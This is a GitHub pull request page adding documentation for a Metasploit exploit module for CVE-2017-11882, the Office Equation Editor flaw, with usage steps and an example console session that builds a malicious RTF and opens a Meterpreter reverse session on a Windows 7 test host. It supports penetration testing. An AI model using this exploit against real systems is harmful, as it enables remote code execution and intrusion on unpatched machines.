Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2017-11882 Microsoft Office Memory Corruption #9226

Merged
merged 12 commits into from Dec 5, 2017
Merged

CVE-2017-11882 Microsoft Office Memory Corruption #9226

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
12 commits
Select commit Hold shift + click to select a range
fcf2cfa
Create office_ms17_11882.md
Nov 21, 2017
39a4d19
Create office_ms17_11882.rb
Nov 21, 2017
fcea6fd
actually create new file ;-;
Nov 21, 2017
db4c0fc
spelling
Nov 22, 2017
275f70e
better saving
Nov 22, 2017
960893b
change default payload
Nov 22, 2017
cb7f173
Update office_ms17_11882.rb
Nov 29, 2017
2544b4d
Change target name
Nov 29, 2017
7df46b3
disassembly ASM
Dec 1, 2017
c788e4e
Update office_ms17_11882.rb
Dec 1, 2017
b7f17f5
fix documentation
Dec 4, 2017
b96dac2
fix info segment
Dec 4, 2017
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
53 changes: 53 additions & 0 deletions documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@

Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.

## Vulnerable Application

- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2007

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`

## Options
### FILENAME
Filename to output, and location to which should be written.


## Example

```
msf > use exploit/windows/fileformat/office_ms17_11882
msf exploit(office_ms17_11882) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_ms17_11882) > set LHOST ens3
LHOST => ens3
msf exploit(office_ms17_11882) > set LPORT 35116
LPORT => 35116
msf exploit(office_ms17_11882) > run
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```
Loading